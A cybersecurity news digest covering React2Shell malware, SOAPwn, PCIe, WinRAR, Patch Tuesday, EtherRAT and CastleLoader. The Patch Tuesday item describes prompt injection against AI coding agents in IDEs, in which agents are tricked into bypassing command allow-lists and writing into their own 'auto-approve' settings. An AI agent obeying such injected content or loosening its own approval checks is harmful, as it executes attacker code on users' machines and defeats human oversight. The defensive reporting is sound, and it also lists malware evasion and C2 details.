2025-12-11 AI创业新闻

React2Shell Exploitation Delivers Crypto Miners and New Malware Across Multiple Sectors

React2Shell continues to witness heavy exploitation, with threat actors leveraging the maximum-severity security flaw in React Server Components (RSC) to deliver cryptocurrency miners and an array of previously undocumented malware families, according to new findings from Huntress. This includes a Linux backdoor called PeerBlight, a reverse proxy tunnel named CowTunnel, and a Go-based post-exploitation implant referred to as ZinFoq. The cybersecurity company said it has observed attackers targeting numerous organizations via CVE-2025-55182, a critical security vulnerability in RSC that allows unauthenticated remote code execution. As of December 8, 2025, these efforts have been aimed at a wide range of sectors, but prominently the construction and entertainment industries.

The first recorded exploitation attempt on a Windows endpoint by Huntress dates back to December 4, 2025, when an unknown threat actor exploited a vulnerable instance of Next.js to drop a shell script, followed by commands to drop a cryptocurrency miner and a Linux backdoor. In two other cases, attackers were observed launching discovery commands and attempting to download several payloads from a command-and-control (C2) server. Some of the notable intrusions also singled out Linux hosts to drop the XMRig cryptocurrency miner, not to mention leveraged a publicly available GitHub tool to identify vulnerable Next.js instances before commencing the attack. “Based on the consistent pattern observed across multiple endpoints, including identical vulnerability probes, shell code tests, and C2 infrastructure, we assess that the threat actor is likely leveraging automated exploitation tooling,” Huntress researchers said.

“This is further supported by the attempts to deploy Linux-specific payloads on Windows endpoints, indicating the automation does not differentiate between target operating systems.” A brief description of some of the payloads downloaded in these attacks is as follows - sex.sh , a bash script that retrieves XMRig 6.24.0 directly from GitHub PeerBlight , a Linux backdoor that shares some code overlaps with two malware families RotaJakiro and Pink that came to light in 2021, installs a systemd service to ensure persistence, and masquerades as a “ ksoftirqd “ daemon process to evade detection CowTunnel , a reverse proxy that initiates an outbound connection to attacker-controlled Fast Reverse Proxy (FRP) servers, effectively bypassing firewalls that are configured to only monitor inbound connections ZinFoq , a Linux ELF binary that implements a post-exploitation framework with interactive shell, file operations, network pivoting, and timestomping capabilities d5.sh , a dropper script responsible for deploying the Sliver C2 framework fn22.sh , a “d5.sh” variant with an added self-update mechanism to fetch a new version of the malware and restart it wocaosinm.sh , a variant of the Kaiji DDoS malware that incorporates remote administration, persistence, and evasion capabilities PeerBlight supports capabilities to establish communications with a hard-coded C2 server (“185.247.224[.]41:8443”), allowing it to upload/download/delete files, spawn a reverse shell, modify file permissions, run arbitrary binaries, and update itself. The backdoor also makes use of a domain generation algorithm (DGA) and BitTorrent Distributed Hash Table (DHT) network as fallback C2 mechanisms. “Upon joining the DHT network, the backdoor registers itself with a node ID beginning with the hardcoded prefix LOLlolLOL,” the researchers explained. “This 9-byte prefix serves as an identifier for the botnet, with the remaining 11 bytes of the 20-byte DHT node ID randomized.” “When the backdoor receives DHT responses containing node lists, it scans for other nodes whose IDs start with LOLlolLOL.

When it finds a matching node, it knows this is either another infected machine or an attacker-controlled node that can provide C2 configuration.” Huntress said it identified over 60 unique nodes with the LOLlolLOL prefix, adding that multiple conditions have to be met in order for an infected bot to share its C2 configuration with another node: a valid client version, configuration availability on the responding bot’s side, and the correct transaction ID. Even when all the necessary conditions are satisfied, the bots are designed such that they only share the configuration about one-third of the time based on a random check, possibly in a bid to reduce network noise and avoid detection. ZinFoq, in a similar manner, beacons out to its C2 server and is equipped to parse incoming instructions to run commands using using “/bin/bash,” enumerate directories, read or delete files, download more payloads from a specified URL, exfiltrate files and system information, start/stop SOCKS5 proxy, enable/disable TCP port forwarding, alter file access and modification times, and establish a reverse pseudo terminal (PTY) shell connection. ZinFoq also takes steps to clear bash history and disguises itself as one of 44 legitimate Linux system services (e.g., “/sbin/audispd,” “/usr/sbin/ModemManager,” “/usr/libexec/colord,” or “/usr/sbin/cron -f”) to conceal its presence.

Organizations relying on react-server-dom-webpack, react-server-dom-parcel, or react-server-dom-turbopack are advised to update immediately, given the “potential ease of exploitation and the severity of the vulnerability,” Huntress said. The development comes as the Shadowserver Foundation said it detected over 165,000 IP addresses and 644,000 domains with vulnerable code as of December 8, 2025, after “scan targeting improvements.” More than 99,200 instances are located in the U.S., followed by Germany (14,100), France (6,400), and India (4,500). Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

.NET SOAPwn Flaw Opens Door for File Writes and Remote Code Execution via Rogue WSDL

New research has uncovered exploitation primitives in the .NET Framework that could be leveraged against enterprise-grade applications to achieve remote code execution. WatchTowr Labs, which has codenamed the “invalid cast vulnerability” SOAPwn , said the issue impacts Barracuda Service Center RMM, Ivanti Endpoint Manager (EPM), and Umbraco 8. But the number of affected vendors is likely to be longer given the widespread use of .NET. The findings were presented today by watchTowr security researcher Piotr Bazydlo at the Black Hat Europe security conference, which is being held in London.

SOAPwn essentially allows attackers to abuse Web Services Description Language (WSDL) imports and HTTP client proxies to execute arbitrary code in products built on the foundations of .NET due to errors in the way they handle Simple Object Access Protocol ( SOAP ) messages. “It is usually abusable through SOAP clients, especially if they are dynamically created from the attacker-controlled WSDL,” Bazydlo said. As a result, .NET Framework HTTP client proxies can be manipulated into using file system handlers and achieve arbitrary file write by passing as URL something like “file://" into a SOAP client proxy, ultimately leading to code execution. To make matters worse, it can be used to overwrite existing files since the attacker controls the full write path.

In a hypothetical attack scenario, a threat actor could leverage this behavior to supply a Universal Naming Convention ( UNC ) path (e.g., “file://attacker.server/poc/poc”) and cause the SOAP request to be written to an SMB share under their control. This, in turn, can allow an attacker to capture the NTLM challenge and crack it. That’s not all. The research also found that a more powerful exploitation vector can be weaponized in applications that generate HTTP client proxies from WSDL files using the ServiceDescriptionImporter class by taking advantage of the fact that it does not validate the URL used by the generated HTTP client proxy.

In this technique, an attacker can provide a URL that points to a WSDL file they control to vulnerable applications, and obtain remote code execution by dropping a fully functional ASPX web shell or additional payloads like CSHTML web shells or PowerShell scripts. Following responsible disclosure in March 2024 and July 2025, Microsoft has opted not to fix the vulnerability, stating the issue stems from either an application issue or behavior, and that “users should not consume untrusted input that can generate and run code.” The findings illustrate how expected behavior in a popular framework can become a potential exploit path that leads to NTLM relaying or arbitrary file writes. The issue has since been addressed in Barracuda Service Center RMM version 2025.1.1 ( CVE-2025-34392 , CVSS score: 9.8) and Ivanti EPM version 2024 SU4 SR1 ( CVE-2025-13659 , CVSS score: 8.8). “It is possible to make SOAP proxies write SOAP requests into files rather than sending them over HTTP,” Bazydlo said.

“In many cases, this leads to remote code execution through webshell uploads or PowerShell script uploads. The exact impact depends on the application using the proxy classes.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Three PCIe Encryption Weaknesses Expose PCIe 5.0+ Systems to Faulty Data Handling

Three security vulnerabilities have been disclosed in the Peripheral Component Interconnect Express (PCIe) Integrity and Data Encryption ( IDE ) protocol specification that could expose a local attacker to serious risks. The flaws impact PCIe Base Specification Revision 5.0 and onwards in the protocol mechanism introduced by the IDE Engineering Change Notice (ECN), according to the PCI Special Interest Group ( PCI-SIG ). “This could potentially result in security exposure, including but not limited to, one or more of the following with the affected PCIe component(s), depending on the implementation: (i) information disclosure, (ii) escalation of privilege, or (iii) denial of service,” the consortium noted . PCIe is a widely used high-speed standard to connect hardware peripherals and components, including graphics cards, sound cards, Wi-Fi and Ethernet adapters, and storage devices, inside computers and servers.

Introduced in PCIe 6.0, PCIe IDE is designed to secure data transfers through encryption and integrity protections. The three IDE vulnerabilities , discovered by Intel employees Arie Aharon, Makaram Raghunandan, Scott Constable, and Shalini Sharma, are listed below - CVE-2025-9612 (Forbidden IDE Reordering) – A missing integrity check on a receiving port may allow re-ordering of PCIe traffic, leading the receiver to process stale data. CVE-2025-9613 (Completion Timeout Redirection) – Incomplete flushing of a completion timeout may allow a receiver to accept incorrect data when an attacker injects a packet with a matching tag. CVE-2025-9614 (Delayed Posted Redirection) – Incomplete flushing or re-keying of an IDE stream may result in the receiver consuming stale, incorrect data packets.

PCI-SIG said that successful exploitation of the aforementioned vulnerabilities could undermine the confidentiality, integrity, and security objectives of IDE. However, the attacks hinge on obtaining physical or low-level access to the targeted computer’s PCIe IDE interface, making them low-severity bugs (CVSS v3.1 score: 3.0/CVSS v4 score: 1.8). “All three vulnerabilities potentially expose systems implementing IDE and Trusted Domain Interface Security Protocol (TDISP) to an adversary that can breach isolation between trusted execution environments,” it said. In an advisory released Tuesday, the CERT Coordination Center (CERT/CC) urged manufacturers to follow the updated PCIe 6.0 standard and apply the Erratum #1 guidance to their IDE implementations.

Intel and AMD have published their own alerts, stating the issues impact the following products - Intel Xeon 6 Processors with P-cores Intel Xeon 6700P-B/6500P-B series SoC with P-Cores. AMD EPYC 9005 Series Processors AMD EPYC Embedded 9005 Series Processors “End users should apply firmware updates provided by their system or component suppliers, especially in environments that rely on IDE to protect sensitive data,” CERT/CC said. Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Webinar: How Attackers Exploit Cloud Misconfigurations Across AWS, AI Models, and Kubernetes

Cloud security is changing. Attackers are no longer just breaking down the door; they are finding unlocked windows in your configurations, your identities, and your code. Standard security tools often miss these threats because they look like normal activity. To stop them, you need to see exactly how these attacks happen in the real world.

Next week, the Cortex Cloud team at Palo Alto Networks is hosting a technical deep dive to walk you through three recent investigations and exactly how to defend against them. Secure your spot for the live session ➜ What Experts Will Cover This isn’t a high-level overview. We are looking at specific, technical findings from the field. In this session, our experts will break down three distinct attack vectors that are bypassing traditional security right now: AWS Identity Misconfigurations: We will show how attackers abuse simple setup errors in AWS identities to gain initial access without stealing a single password.

Hiding in AI Models: You will see how adversaries mask malicious files in production by mimicking the naming structures of your legitimate AI models. Risky Kubernetes Permissions: We will examine “overprivileged entities”—containers that have too much power—and how attackers exploit them to take over infrastructure. We won’t just talk about the problems; we will show you the mechanics of the attacks. Register now to see the full breakdown of these threats.

Why This Matters for Your Team The core issue with these threats is the visibility gap. Often, the Cloud team builds the environment, and the SOC (Security Operations Center) monitors it, but neither side sees the full picture. In this webinar, we will demonstrate how Code-to-Cloud detection fixes this. We will show you how to use runtime intelligence and audit logs to spot these threats early.

The Takeaway By the end of this session, you will have actionable insights on how to: Audit your cloud logs for “invisible” intruders. Clean up risky permissions in Kubernetes. Apply AI-aware controls to protect your development pipeline. Don’t wait until you find these vulnerabilities in a breach report.

Join us next week and get the knowledge you need to close the gaps. Register for the Webinar ➜ Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Warning: WinRAR Vulnerability CVE-2025-6218 Under Active Attack by Multiple Threat Groups

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday added a security flaw impacting the WinRAR file archiver and compression utility to its Known Exploited Vulnerabilities ( KEV ) catalog, citing evidence of active exploitation. The vulnerability, tracked as CVE-2025-6218 (CVSS score: 7.8), is a path traversal bug that could enable code execution. However, for exploitation to succeed, it requires a prospective target to visit a malicious page or open a malicious file.

“RARLAB WinRAR contains a path traversal vulnerability allowing an attacker to execute code in the context of the current user,” CISA said in an alert. The vulnerability was patched by RARLAB with WinRAR 7.12 in June 2025. It only affects Windows-based builds. Versions of the tool for other platforms, including Unix and Android, are not affected.

“This flaw could be exploited to place files in sensitive locations — such as the Windows Startup folder — potentially leading to unintended code execution on the next system login,” RARLAB noted at the time. The development comes in the wake of multiple reports from BI.ZONE, Foresiet, SecPod, and Synaptic Security, the vulnerability has been exploited by two different threat actors tracked as GOFFEE (aka Paper Werewolf), Bitter (aka APT-C-08 or Manlinghua), and Gamaredon. In an analysis published in August 2025, the Russian cybersecurity vendor said there are indications that GOFFEE may be exploited CVE-2025-6218 along with CVE-2025-8088 (CVSS score: 8.8), another path traversal flaw in WinRAR, in attacks targeting organizations in the country in July 2025 via phishing emails. It has since emerged that the South Asia-focused Bitter APT has also weaponized the vulnerability to facilitate persistence on the compromised host and ultimately drop a C# trojan by means of a lightweight downloader.

The attack leverages a RAR archive (“Provision of Information for Sectoral for AJK.rar”) that contains a benign Word document and a malicious macro template. “The malicious archive drops a file named Normal.dotm into Microsoft Word’s global template path,” Foresiet said last month. “Normal.dotm is a global template that loads every time Word is opened. By replacing the legitimate file, the attacker ensures their malicious macro code executes automatically, providing a persistent backdoor that bypasses standard email macro blocking for documents received after the initial compromise.” The C# trojan is designed to contact an external server (“johnfashionaccess[.]com”) for command-and-control (C2) and enable keylogging, screenshot capture, remote desktop protocol (RDP) credential harvesting, and file exfiltration.

It’s assessed that the RAR archives are propagated via spear-phishing attacks. Last but not least, CVE-2025-6218 has also been exploited by a Russian hacking group known as Gamaredon in phishing campaigns targeting Ukrainian military, governmental, political, and administrative entities to infect them with a malware referred to as Pteranodon . The activity was first observed in November 2025. “This is not an opportunistic campaign,” a security researcher who goes by the name Robin said .

“It is a structured, military-oriented espionage and sabotage operation consistent with, and likely coordinated by, Russian state intelligence.” It’s worth noting that the adversary has also extensively abused CVE-2025-8088, using it to deliver malicious Visual Basic Script malware and even deploying a new wiper codenamed GamaWiper. “This marks the first observed instance of Gamaredon conducting destructive operations rather than its traditional espionage activities,” ClearSky said in a November 30, 2025, post on X. In light of active exploitation, Federal Civilian Executive Branch (FCEB) agencies are required to apply the necessary fixes by December 30, 2025, to secure their networks. Found this article interesting?

Microsoft Issues Security Fixes for 56 Flaws, Including Active Exploit and Two Zero-Days

Microsoft closed out 2025 with patches for 56 security flaws in various products across the Windows platform, including one vulnerability that has been actively exploited in the wild. Of the 56 flaws, three are rated Critical, and 53 are rated Important in severity. Two other defects are listed as publicly known at the time of the release. These include 29 privilege escalation, 18 remote code execution, four information disclosure, three denial-of-service, and two spoofing vulnerabilities.

In total, Microsoft has addressed a total of 1,275 CVEs in 2025, according to data compiled by Fortra. Tenable’s Satnam Narang said 2025 also marks the second consecutive year where the Windows maker has patched over 1,000 CVEs. It’s the third time it has done so since Patch Tuesday’s inception. The update is in addition to 17 shortcomings the tech giant patched in its Chromium-based Edge browser since the release of the November 2025 Patch Tuesday update .

This also consists of a spoofing vulnerability in Edge for iOS ( CVE-2025-62223 , CVSS score: 4.3). The vulnerability that has come under active exploitation is CVE-2025-62221 (CVSS score: 7.8), a use-after-free in Windows Cloud Files Mini Filter Driver that could allow an authorized attacker to elevate privileges locally and obtain SYSTEM permissions. “File system filter drivers, aka minifilters, attach to the system software stack, and intercept requests targeted at a file system, and extend or replace the functionality provided by the original target,” Adam Barnett, lead software engineer at Rapid7, said in a statement. “Typical use cases include data encryption, automated backup, on-the-fly compression, and cloud storage.” “The Cloud Files minifilter is used by OneDrive, Google Drive, iCloud, and others, although as a core Windows component, it would still be present on a system where none of those apps were installed.” It’s currently not known how the vulnerability is being abused in the wild and in what context, but successful exploitation requires an attacker to obtain access to a susceptible system through some other means.

Microsoft Threat Intelligence Center (MSTIC) and Microsoft Security Response Center (MSRC) have been credited with discovering and reporting the flaw. According to Mike Walters, president and co-founder of Action1, a threat actor could gain low-privileged access through methods like phishing, web browser exploits, or another known remote code execution flaw, and then chain it with CVE-2025-62221 to seize control of the host. Armed with this access, the attacker could deploy kernel components or abuse signed drivers to evade defenses and maintain persistence, and can be weaponized to achieve a domain-wide compromise when coupled with credential theft scenarios. The exploitation of CVE-2025-62221 has prompted the U.S.

Cybersecurity and Infrastructure Security Agency (CISA) to add it to the Known Exploited Vulnerabilities ( KEV ) catalog, mandating Federal Civilian Executive Branch (FCEB) agencies to apply the patch by December 30, 2025. The remaining two zero-days are listed below - CVE-2025-54100 (CVSS score: 7.8) - A command injection vulnerability in Windows PowerShell that allows an unauthorized attacker to execute code locally CVE-2025-64671 (CVSS score: 8.4) - A command injection vulnerability in GitHub Copilot for JetBrains that allows an unauthorized attacker to execute code locally “This is a command injection flaw in how Windows PowerShell processes web content,” Action1’s Alex Vovk said about CVE-2025-54100. “It lets an unauthenticated attacker execute arbitrary code in the security context of a user who runs a crafted PowerShell command, such as Invoke-WebRequest.” “The threat becomes significant when this vulnerability is combined with common attack patterns. For example, an attacker can use social engineering to persuade a user or admin to run a PowerShell snippet using Invoke-WebRequest, allowing a remote server to return crafted content that triggers the parsing flaw and leads to code execution and implant deployment.” It’s worth noting that CVE-2025-64671 comes in the wake of a broader set of security vulnerabilities collectively named IDEsaster that was recently disclosed by security researcher Ari Marzouk.

The issues arise as a result of adding agentic capabilities to an integrated development environment (IDE), exposing new security risks in the process. These attacks leverage prompt injections against the artificial intelligence (AI) agents embedded into IDEs and combine them with the base IDE layer to result in information disclosure or command execution. “This uses an ‘old’ attack chain of using a vulnerable tool, so not exactly part of the IDEsaster novel attack chain,” Marzouk, who is credited with discovering and reporting the flaw, told The Hacker News. “Specifically, a vulnerable ‘execute command’ tool where you can bypass the user-configured allow list.” Marzouk also said multiple IDEs were found vulnerable to the same attack, including Kiro.dev, Cursor ( CVE-2025-54131 ), JetBrains Junie ( CVE-2025-59458 ), Gemini CLI, Windsurf, and Roo Code ( CVE-2025-54377 , CVE-2025-57771 , and CVE-2025-65946 ).

Furthermore, GitHub Copilot for Visual Studio Code has been found to be susceptible to the vulnerability, although, in this case, Microsoft assigned it a “Medium” severity rating with no CVE. “The vulnerability states that it’s possible to gain code execution on affected hosts by tricking the LLM into running commands that bypass the guardrails and appending instructions in the user’s ‘auto-approve’ settings,” Kev Breen, senior director of cyber threat research at Immersive, said. “This can be achieved through ‘Cross Prompt Injection,’ which is where the prompt is modified not by the user but by the LLM agents as they craft their own prompts based on the content of files or data retrieved from a Model Context Protocol (MCP) server that has risen in popularity with agent-based LLMs.” Software Patches from Other Vendors In addition to Microsoft, security updates have also been released by other vendors over the past several weeks to rectify multiple vulnerabilities, including — Adobe Amazon Web Services AMD Arm ASUS Atlassian Bosch Broadcom (including VMware) Canon Cisco Citrix CODESYS Dell Devolutions Django Drupal F5 Fortinet Fortra GitLab Google Android and Pixel Google Chrome Google Cloud Google Pixel Watch Hitachi Energy HP HP Enterprise (including Aruba Networking and Juniper Networks) IBM Imagination Technologies Intel Ivanti Lenovo Linux distributions AlmaLinux , Alpine Linux , Amazon Linux , Arch Linux , Debian , Gentoo , Oracle Linux , Mageia , Red Hat , Rocky Linux , SUSE , and Ubuntu MediaTek Mitsubishi Electric MongoDB Moxa Mozilla Firefox and Firefox ESR NVIDIA OPPO Progress Software Qualcomm React Rockwell Automation Samsung SAP Schneider Electric Siemens SolarWinds Splunk Synology TP-Link WatchGuard Zoom , and Zyxel Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Fortinet, Ivanti, and SAP Issue Urgent Patches for Authentication and Code Execution Flaws

Fortinet, Ivanti, and SAP have moved to address critical security flaws in their products that, if successfully exploited, could result in an authentication bypass and code execution. The Fortinet vulnerabilities affect FortiOS, FortiWeb, FortiProxy, and FortiSwitchManager and relate to a case of improper verification of a cryptographic signature. They are tracked as CVE-2025-59718 and CVE-2025-59719 (CVSS scores: 9.8). “An Improper Verification of Cryptographic Signature vulnerability [CWE-347] in FortiOS, FortiWeb, FortiProxy, and FortiSwitchManager may allow an unauthenticated attacker to bypass the FortiCloud SSO login authentication via a crafted SAML message, if that feature is enabled on the device,” Fortinet said in an advisory.

The company, however, noted that the FortiCloud SSO login feature is not enabled in the default factory settings. FortiCloud SSO login is enabled when an administrator registers the device to FortiCare and has not disabled the toggle “Allow administrative login using FortiCloud SSO” in the registration page. To temporarily protect their systems against attacks exploiting these vulnerabilities, organizations are advised to disable the FortiCloud login feature (if enabled) until it can be updated. This can be done in two ways - Go to System -> Settings -> Switch “Allow administrative login using FortiCloud SSO” to Off Run the below command in the CLI - config system global set admin-forticloud-sso-login disable end Ivanti Releases Fix for Critical EPM Flaw Ivanti has also shipped updates to address four security flaws in Endpoint Manager (EPM), one of which is a critical severity bug in the EPM core and remote consoles.

The vulnerability, assigned the CVE identifier CVE-2025-10573 , carries a CVSS score of 9.6. “Stored XSS in Ivanti Endpoint Manager prior to version 2024 SU4 SR1 allows a remote unauthenticated attacker to execute arbitrary JavaScript in the context of an administrator session,” Ivanti said . Rapid7 security researcher Ryan Emmons, who discovered and reported the shortcoming on August 15, 2025, said it allows an attacker with unauthenticated access to the primary EPM web service to join fake managed endpoints to the EPM server so as to poison the administrator web dashboard with malicious JavaScript. “When an Ivanti EPM administrator views one of the poisoned dashboard interfaces during normal usage, that passive user interaction will trigger client-side JavaScript execution, resulting in the attacker gaining control of the administrator’s session,” Emmons said .

Douglas McKee, director of vulnerability intelligence at Rapid7, said in a statement that CVE-2025-10573 represents a serious risk as it’s trivial to exploit and can be done so by sending a fake device report to the server using a basic file format. “While the attack only fully executes when an administrator views the dashboard, this is a routine and necessary task for IT staff; consequently, the likelihood of triggering the exploit during normal operations is high, ultimately allowing the attacker to take control of the administrator’s session,” McKee added. Ensar Seker, CISO at threat intelligence company SOCRadar, also emphasized that the user interaction requirement doesn’t reduce the vulnerability’s threat level and that it has a “significant” exploitation potential when combined with social engineering. “Remote code execution via JavaScript injection is no longer theoretical in supply chain attacks; it’s become operationally viable,” Seker said.

“Organizations must act swiftly to patch, and more importantly, implement rigorous user interface sanitization and privilege segmentation.” The company noted that user interaction is required to exploit the flaw and that it’s not aware of any attacks in the wild. It has been patched in EPM version 2024 SU4 SR1. Also patched in the same version are three other high-severity vulnerabilities (CVE-2025-13659, CVE-2025-13661, and CVE-2025-13662) that could allow a remote, unauthenticated attacker to achieve arbitrary code execution. CVE-2025-13662, like in the case of CVE-2025-59718 and CVE-2025-59719, stems from improper verification of cryptographic signatures in the patch management component.

SAP Fixes Three Critical Flaws Lastly, SAP has pushed December security updates to address 14 vulnerabilities across multiple products, including three critical-severity flaws. They are listed below - CVE-2025-42880 (CVSS score: 9.9) - A code injection vulnerability in SAP Solution Manager CVE-2025-55754 (CVSS score: 9.6) - Multiple vulnerabilities in Apache Tomcat within SAP Commerce Cloud CVE-2025-42928 (CVSS score: 9.1) - A deserialization vulnerability in SAP jConnect SDK for Sybase Adaptive Server Enterprise (ASE) Boston-based SAP security platform Onapsis has been credited with reporting CVE-2025-42880 and CVE-2025-42928. The company said it identified a remote-enabled function module in SAP Solution Manager that enables an authenticated attacker to inject arbitrary code. “Given the central role of SAP Solution Manager in the SAP system landscape, we strongly recommend a timely patch,” Onapsis security researcher Thomas Fritsch said.

CVE-2025-42928, on the other hand, allows for remote code execution by providing specially crafted input to the SAP jConnect SDK component. However, a successful exploitation requires elevated privileges. With security vulnerabilities in Fortinet, Ivanti, and SAP’s software frequently exploited by bad actors, it’s essential that users move quickly to apply the fixes. Found this article interesting?

North Korea-linked Actors Exploit React2Shell to Deploy New EtherRAT Malware

Threat actors with ties to North Korea have likely become the latest to exploit the recently disclosed critical React2Shell security flaw in React Server Components (RSC) to deliver a previously undocumented remote access trojan dubbed EtherRAT . “EtherRAT leverages Ethereum smart contracts for command-and-control (C2) resolution, deploys five independent Linux persistence mechanisms, and downloads its own Node.js runtime from nodejs.org,” Sysdig said in a report published Monday. The cloud security firm said the activity exhibits significant overlap with a long-running campaign codenamed Contagious Interview , which has been observed leveraging the EtherHiding technique to distribute malware since February 2025. Contagious Interview is the name given to a series of attacks in which blockchain and Web3 developers, among others, are targeted through fake job interviews, coding assignments, and video assessments, leading to the deployment of malware.

These efforts typically begin with a ruse that lures victims via platforms like LinkedIn, Upwork, or Fiverr, where the threat actors pose as recruiters offering lucrative job opportunities. According to software supply chain security company Socket, it’s one of the most prolific campaigns exploiting the npm ecosystem, highlighting their ability to adapt to JavaScript and cryptocurrency-centric workflows. The attack chain commences with the exploitation of CVE-2025-55182 (CVSS score: 10.0), a maximum-severity security vulnerability in RSC, to execute a Base64-encoded shell command that downloads and runs a shell script responsible for deploying the main JavaScript implant. The shell script is retrieved using a curl command, with wget and python3 used as fallbacks.

It is also designed to prepare the environment by downloading Node.js v20.10.0 from nodejs.org, following which it writes to disk an encrypted blob and an obfuscated JavaScript dropper. Once all these steps are complete, it proceeds to delete the shell script to minimize the forensic trail and runs the dropper. The primary goal of the dropper is to decrypt the EtherRAT payload with a hard-coded key and spawn it using the downloaded Node.js binary. The malware is notable for using EtherHiding to fetch the C2 server URL from an Ethereum smart contract every five minutes, allowing the operators to update the URL easily, even if it’s taken down.

“What makes this implementation unique is its use of consensus voting across nine public Ethereum remote procedure call (RPC) endpoints,” Sysdig said. “EtherRAT queries all nine endpoints in parallel, collects responses, and selects the URL returned by the majority.” “This consensus mechanism protects against several attack scenarios: a single compromised RPC endpoint cannot redirect bots to a sinkhole, and researchers cannot poison C2 resolution by operating a rogue RPC node.” It’s worth noting that a similar implementation was previously observed in two npm packages named colortoolsv2 and mimelib2 that were found to deliver downloader malware on developer systems. Once EtherRAT establishes contact with the C2 server, it enters a polling loop that executes every 500 milliseconds, interpreting any response that’s longer than 10 characters as JavaScript code to be run on the infected machine. Persistence is accomplished by using five different methods - Systemd user service XDG autostart entry Cron jobs .bashrc injection Profile injection By using multiple mechanisms, the threat actors can ensure the malware runs even after a system reboot and grants them continued access to the infected systems.

Another sign that points to the malware’s sophistication is the self-update ability that overwrites itself with the new code received from the C2 server after sending its own source code to an API endpoint. It then launches a new process with the updated payload. What’s notable here is that the C2 returns a functionally identical but differently obfuscated version, thereby possibly allowing it to bypass static signature-based detection. In addition to the use of EtherHiding, the links to Contagious Interview stem from overlaps between the encrypted loader pattern used in EtherRAT and a known JavaScript information stealer and downloader named BeaverTail .

“EtherRAT represents a significant evolution in React2Shell exploitation, moving beyond opportunistic cryptomining and credential theft toward persistent, stealthy access designed for long-term operations,” Sysdig said. “Whether this represents North Korean actors pivoting to new exploitation vectors or sophisticated technique borrowing by another actor, the result is the same: defenders face a challenging new implant that resists traditional detection and takedown methods.” Contagious Interview Shifts from npm to VS Code The disclosure comes as OpenSourceMalware revealed details of a new Contagious Interview variant that urges victims to clone a malicious repository on GitHub, GitLab, or Bitbucket as part of a programming assignment, and launch the project in Microsoft Visual Studio Code (VS Code). This results in the execution of a VS Code tasks.json file due to it being configured with runOptions.runOn: ‘folderOpen,’ causing it to auto-run as soon as the project is opened. The file is engineered to download a loader script using curl or wget based on the operating system of the compromised host.

In the case of Linux, the next stage is a shell script that downloads and runs another shell script named “vscode-bootstrap.sh,” which then fetches two more files, “package.json” and “env-setup.js,” the latter of which serves as a launchpad for BeaverTail and InvisibleFerret. OpenSourceMalware said it identified 13 different versions of this campaign spread across 27 different GitHub users and 11 different versions of BeaverTail. The earliest repository (“github[.]com/MentarisHub121/TokenPresaleApp”) dates back to April 22, 2025, and the most recent version (“github[.]com/eferos93/test4”) was created on December 1, 2025. “DPRK threat actors have flocked to Vercel, and are now using it almost exclusively,” the OpenSourceMalware team said.

“We don’t know why, but Contagious Interview has stopped using Fly.io, Platform.sh, Render and other hosting providers.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Four Threat Clusters Using CastleLoader as GrayBravo Expands Its Malware Service Infrastructure

Four distinct threat activity clusters have been observed leveraging a malware loader known as CastleLoader , strengthening the previous assessment that the tool is offered to other threat actors under a malware-as-a-service (MaaS) model. The threat actor behind CastleLoader has been assigned the name GrayBravo by Recorded Future’s Insikt Group, which was previously tracking it as TAG-150 . The malware first emerged in early 2025. GrayBravo is “characterized by rapid development cycles, technical sophistication, responsiveness to public reporting, and an expansive, evolving infrastructure,” the Mastercard-owned company said in an analysis published today.

Some of the notable tools in the threat actor’s toolset include a remote access trojan called CastleRAT and a malware framework referred to as CastleBot, which comprises three components: a shellcode stager/downloader, a loader, and a core backdoor. The CastleBot loader is responsible for injecting the core module, which is equipped to contact its command-and-control (C2) server to retrieve tasks that enable it to download and execute DLL, EXE, and PE (portable executable) payloads. Some of the malware families distributed via this framework are DeerStealer , RedLine Stealer , StealC Stealer , NetSupport RAT , SectopRAT , MonsterV2 , WARMCOOKIE , and even other loaders like Hijack Loader . Recorded Future’s latest analysis has uncovered four clusters of activity, each operating with distinct tactics - Cluster 1 (TAG-160) , which targets the logistics sector using phishing and ClickFix techniques to distribute CastleLoader (Active since at least March 2025) Cluster 2 (TAG-161) , which uses Booking.com-themed ClickFix campaigns to distribute CastleLoader and Matanbuchus 3.0 (Active since at least June 2025) Cluster 3 , which uses infrastructure impersonating Booking.com in conjunction with ClickFix and Steam Community pages as a dead drop resolver to deliver CastleRAT via CastleLoader (Active since at least March 2025) Cluster 4 , which uses malvertising and fake software update lures masquerading as Zabbix and RVTools to distribute CastleLoader and NetSupport RAT (Active since at least April 2025) GrayBravo has been found to leverage a multi-tiered infrastructure to support its operations.

This includes Tier 1 victim-facing C2 servers associated with malware families like CastleLoader, CastleRAT, SectopRAT, and WARMCOOKIE, as well as multiple VPS servers that likely operate as backups. The attacks mounted by TAG-160 are also notable for using fraudulent or compromised accounts created on freight-matching platforms like DAT Freight & Analytics and Loadlink Technologies to enhance the credibility of its phishing campaigns. The activity, Recorded Future added, illustrates a deep understanding of industry operations, impersonating legitimate logistics firms, exploiting freight-matching platforms, and mirroring authentic communications to enhance its deception and impact. It’s been assessed with low confidence that the activity could be related to another unattributed cluster that targeted transportation and logistics companies in North America last year to distribute various malware families.

“GrayBravo has significantly expanded its user base, evidenced by the growing number of threat actors and operational clusters leveraging its CastleLoader malware,” Recorded Future said. “This trend highlights how technically advanced and adaptive tooling, particularly from a threat actor with GrayBravo’s reputation, can rapidly proliferate within the cybercriminal ecosystem once proven effective.” The development comes as Blackpoint detailed a Python dropper-based attack chain that uses ClickFix techniques to distribute the CastleLoader, shifting from earlier campaigns that used a ZIP archive containing AutoIt scripts. “In this case, the ClickFix command downloaded a small archive and staged its contents inside the user’s AppData directory before invoking a bundled copy of pythonw.exe to execute one of the extracted files,” security researcher Sam Decker said . “That script served as a simple Python stager whose only job was to rebuild and execute a CastleLoader payload.” Found this article interesting?

Storm-0249 Escalates Ransomware Attacks with ClickFix, Fileless PowerShell, and DLL Sideloading

